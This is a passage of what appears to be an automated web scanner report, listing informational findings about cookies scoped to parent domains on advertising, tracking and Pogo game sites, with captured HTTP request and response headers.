path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_email=test4%40fastdial Vary: Accept-Encoding,User Content-Type: text/html Content-Length: 31484 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <!-- If ...[SNIP]... |
9.6. http://ad.doubleclick.net/click previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /click |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- id=c653243310000d9
|2070351/902302/14983|t =1294099968|et=730|cs =gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
Request
GET /click;h=v8/3a8a/4/a7/%2a Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t |
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://ad.amgdgt.com/ads Set-Cookie: id=c653243310000d9 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sun, 09 Jan 2011 02:03:13 GMT Server: GFE/2.0 Content-Type: text/html Connection: close |
9.7. http://ad.turn.com/server/pixel.htm previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.turn.com |
Path: | /server/pixel.htm |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 01:48:35 GMT; Path=/
Request
GET /server/pixel.htm?fpid=10 Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://www.mlive.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pf=TiY2Y7UsIzsDKs0Lv |
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 01:48:35 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 01:48:35 GMT Content-Length: 377 <html> <head> </head> <body> <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com ...[SNIP]... |
9.8. http://admeld.adnxs.com/usersync previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://admeld.adnxs.com |
Path: | /usersync |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- uuid2=4760492999213801733
; path=/; expires=Sat, 09-Apr-2011 02:01:48 GMT; domain=.adnxs.com; HttpOnly
Request
GET /usersync?calltype=admeld Host: admeld.adnxs.com Proxy-Connection: keep-alive Referer: http://www.pandora.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anj=Kfu=8fG7]PCxrx)0s]# |
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 10-Jan-2011 02:01:48 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733 Content-Type: application/x-javascript Date: Sun, 09 Jan 2011 02:01:48 GMT Content-Length: 155 document.write('<img src="http://tag.admeld |
9.9. http://ads.adxpose.com/ads/ads.js previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://ads.adxpose.com |
Path: | /ads/ads.js |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- evlu=9f6f0757-8308-4d33
-b185-c4e0ced3c79a; Domain=adxpose.com; Expires=Fri, 27-Jan-2079 05:15:53 GMT; Path=/
Request
GET /ads/ads.js?uid Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://www.pandora.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=C8DDA40C8 ETag: "0-gzip" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Set-Cookie: evlu=9f6f0757-8308-4d33 Content-Type: text/javascript;charset Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:01:46 GMT Connection: close if(typeof __ADXPOSE_CONTAINERS__=== ...[SNIP]... |
9.10. http://altfarm.mediaplex.com/ad/js/55290 previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://altfarm.mediaplex |
Path: | /ad/js/55290 |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- svid=517004695355; expires=Wed, 8-Jan-2014 5:33:36 GMT; path=/; domain=.mediaplex.com;
Request
GET /ad/js/55290?mpt=3334527 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Cache-Control: no-cache Set-Cookie: svid=517004695355; expires=Wed, 8-Jan-2014 5:33:36 GMT; path=/; domain=.mediaplex.com; P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV" Location: http://img.mediaplex.com Content-Length: 0 Date: Sun, 09 Jan 2011 02:01:54 GMT |
9.11. http://b.scorecardresearch.com/b previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /b |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- UID=1f00d615-24.143.206
.88-1294170954; expires=Tue, 08-Jan-2013 01:22:52 GMT; path=/; domain=.scorecardresearch .com
Request
GET /b?c1=2&c2=6036333&rn Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pandora.com Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=1f00d615-24.143.206 |
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Sun, 09 Jan 2011 01:22:52 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS |
9.12. http://b.scorecardresearch.com/p previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /p |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- UID=1f00d615-24.143.206
.88-1294170954; expires=Tue, 08-Jan-2013 01:22:56 GMT; path=/; domain=.scorecardresearch .com
Request
GET /p?c1=8&c2=6035179&c3=1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pandora.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=1f00d615-24.143.206 |
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Sun, 09 Jan 2011 01:22:56 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS GIF89a.............!..... |
9.13. http://b.scorecardresearch.com/r previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /r |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- UID=1f00d615-24.143.206
.88-1294170954; expires=Tue, 08-Jan-2013 01:24:25 GMT; path=/; domain=.scorecardresearch .com
Request
GET /r?c2=6035165&d.c=gif&d.o Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=1f00d615-24.143.206 |
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Sun, 09 Jan 2011 01:24:25 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS GIF89a.............!..... |
9.14. http://board-games.pogo.com/ previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://board-games.pogo |
Path: | / |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- prod.JID=9647E635CE2
6F393097DADDDE17451AE .000192; Domain=.pogo.com; Path=/ - com.pogo.unid=660628
2471652314; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:17 GMT; Path=/
Request
GET /?pageSection=footer Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=9647E635CE2 Content-Language: en-US Set-Cookie: com.pogo.unid=660628 Location: http://board-games.pogo Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:06:17 GMT Server: Apache-Coyote/1.1 |
9.15. http://board-games.pogo.com/games/monopoly previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://board-games.pogo |
Path: | /games/monopoly |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- prod.JID=C044D23F948
B766D6981FBBCF5BAB72F .000115; Domain=.pogo.com; Path=/ - com.pogo.unid=660637
2665965638; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:18 GMT; Path=/
Request
GET /games/monopoly HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=C044D23F948 Content-Language: en-US Set-Cookie: com.pogo.unid=660637 Location: http://board-games.pogo Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:06:17 GMT Server: Apache-Coyote/1.1 |
9.16. http://board-games.pogo.com/games/online-chess previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://board-games.pogo |
Path: | /games/online-chess |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- prod.JID=8156B355ACC
AE0414EB6405CFDC5596E .000226; Domain=.pogo.com; Path=/ - com.pogo.unid=660645
8565311528; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:19 GMT; Path=/
Request
GET /games/online-chess HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=8156B355ACC Content-Language: en-US Set-Cookie: com.pogo.unid=660645 Location: http://board-games.pogo Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:06:19 GMT Server: Apache-Coyote/1.1 |
9.17. http://board-games.pogo.com/games/risk previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://board-games.pogo |
Path: | /games/risk |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- prod.JID=B04A73F8228
8DFD7D07A20FE079D68B6 .000048; Domain=.pogo.com; Path=/ - com.pogo.unid=660628
6766626273; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:18 GMT; Path=/
Request
GET /games/risk HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=B04A73F8228 Content-Language: en-US Set-Cookie: com.pogo.unid=660628 Location: http://board-games.pogo Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:06:18 GMT Server: Apache-Coyote/1.1 |
9.18. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/Banner |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- A2=gn3Ka4Ki09MY0000820wsF
; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ - B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
- C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
- D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
- E2=09MYgA92sF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
- u2=0a5bbe64-f3a2-4a01
-921a-a3ef743897893G602g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ - U=0a5bbe64-f3a2-4a01-921a
-a3ef743897893G602g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Request
GET /BurstingPipe/Banner Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=0a5bbe64-f3a2-4a01-921a |
Response
HTTP/1.1 302 Object moved Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Location: http://ds.serving-sys.com Server: Microsoft-IIS/7.5 Set-Cookie: eyeblaster=BWVal=&BWDate= Set-Cookie: A2=gn3Ka4Ki09MY0000820wsF Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: E2=09MYgA92sF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=0a5bbe64-f3a2-4a01 Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=0a5bbe64-f3a2-4a01-921a Set-Cookie: C_7971\=4288750 P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 09 Jan 2011 02:06:26 GMT Connection: close |
9.19. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/Bursti |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- A2=gn3Ka4JO09MY00008y8ysF
; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ - B2=83xP08y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
- C3=0u3F8y8ysF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
- D3=0u3F00358y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
- E2=09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
- u2=1b39b065-3668-4ab4
-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ - U=1b39b065-3668-4ab4-a4dc
-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Request
GET /BurstingPipe/Bursti Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: E2=09MY820wsF; A2=gn3Ka4JO09MY0000820wsF |
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: A2=gn3Ka4JO09MY00008y8ysF Set-Cookie: B2=83xP08y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0u3F8y8ysF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0u3F00358y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: E2=09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=1b39b065-3668-4ab4 Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=1b39b065-3668-4ab4-a4dc Set-Cookie: eyeblaster=BWVal=&BWDate= P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 09 Jan 2011 01:34:53 GMT Connection: close Content-Length: 0 |
9.20. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/adServer.bs |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- A2=gn3Ka4JO09MY0000820wsF
; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ - B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
- C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
- D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
- E2=09MY820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
- u2=1b39b065-3668-4ab4
-a4dc-a28fe9442aaf3G6010; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ - U=1b39b065-3668-4ab4-a4dc
-a28fe9442aaf3G6010; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Request
GET /BurstingPipe/adServer.bs Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: eyeblaster=BWVal=&BWDate= Set-Cookie: A2=gn3Ka4JO09MY0000820wsF Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: E2=09MY820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=1b39b065-3668-4ab4 Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=1b39b065-3668-4ab4-a4dc P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 09 Jan 2011 01:34:09 GMT Connection: close Content-Length: 1864 var ebPtcl="http://";var ebBigS="ds.serving-sys ...[SNIP]... |
9.21. http://card-games.pogo.com/ previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://card-games.pogo |
Path: | / |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- prod.JID=5CA8BC1EE74
B1F0277527A2DFCBA98BA .000080; Domain=.pogo.com; Path=/ - com.pogo.unid=660626
0996807036; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:34 GMT; Path=/
Request
GET / HTTP/1.1 Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=5CA8BC1EE74 Content-Language: en-US Set-Cookie: com.pogo.unid=660626 Location: http://card-games.pogo Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:06:33 GMT Server: Apache-Coyote/1.1 |
9.22. http://card-games.pogo.com/games/cribbage previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://card-games.pogo |
Path: | /games/cribbage |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- prod.JID=D6065BE7003
57567D81FA6325202FBAB .000289; Domain=.pogo.com; Path=/ - com.pogo.unid=660644
9975376793; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:36 GMT; Path=/
Request
GET /games/cribbage HTTP/1.1 Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=D6065BE7003 Content-Language: en-US Set-Cookie: com.pogo.unid=660644 Location: http://card-games.pogo Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:06:36 GMT Server: Apache-Coyote/1.1 |
9.23. http://card-games.pogo.com/games/rainy-day-spider-solitaire previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://card-games.pogo |
Path: | /games/rainy-day-spider |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- prod.JID=E00D1123E11
EC01BCF283E18C15DAA77 .000289; Domain=.pogo.com; Path=/ - com.pogo.unid=660644
9975376790; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:35 GMT; Path=/
Request
GET /games/rainy-day-spider Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=E00D1123E11 Content-Language: en-US Set-Cookie: com.pogo.unid=660644 Location: http://card-games.pogo Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:06:35 GMT Server: Apache-Coyote/1.1 |
9.24. http://click.linksynergy.com/fs-bin/stat previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://click.linksynergy |
Path: | /fs-bin/stat |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- lsn_statp=FAJFJR4AAA
AW5BfG5xryCg%3D%3D; Domain=.linksynergy.com; Expires=Sat, 04-Jan-2031 02:07:10 GMT; Path=/ - lsn_qstring=FLenzF8lvbI
%3A146261%3A; Domain=.linksynergy.com; Expires=Mon, 10-Jan-2011 02:07:10 GMT; Path=/ - lsn_track=UmFuZG9tSVZz
%2FLfL%2BfxkMJigkTOg xt3zHfLpNpk0lNFQF8gd %2BQ2vXz0pvncGUWzpoj69n %2Ber3qdc06h0wR6%2F3g%3D %3D; Domain=.linksynergy.com; Expires=Wed, 06-Jan-2021 02:07:10 GMT; Path=/ - lsclick_mid13508="2011-01
-09 02:07:10.379|FLenzF8lvbI -jRY9Ep2QlsT7E2gTD46DFg"; Domain=.linksynergy.com; Expires=Tue, 08-Jan-2013 02:07:10 GMT; Path=/
Request
GET /fs-bin/stat?id Host: click.linksynergy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
